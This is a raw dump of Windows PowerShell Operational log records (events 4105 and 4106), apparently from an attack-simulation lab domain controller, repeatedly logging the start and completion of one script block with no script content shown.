Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474894
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474893
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474892
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474891
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474890
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474889
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474888
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474887
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474886
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474885
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474884
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474883
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474882
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474881
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474880
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474879
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474878
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474877
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474876
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474875
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474874
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474873
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474872
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474871
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474870
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474869
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474868
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474867
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474866
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474865
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474864
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474863
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474862
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474861
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474860
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474859
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474858
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474857
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474856
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474855
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474854
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474853
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474852
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474851
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474850
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474849
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474848
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474847
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474846
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474845
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474844
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474843
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474842
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474841
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
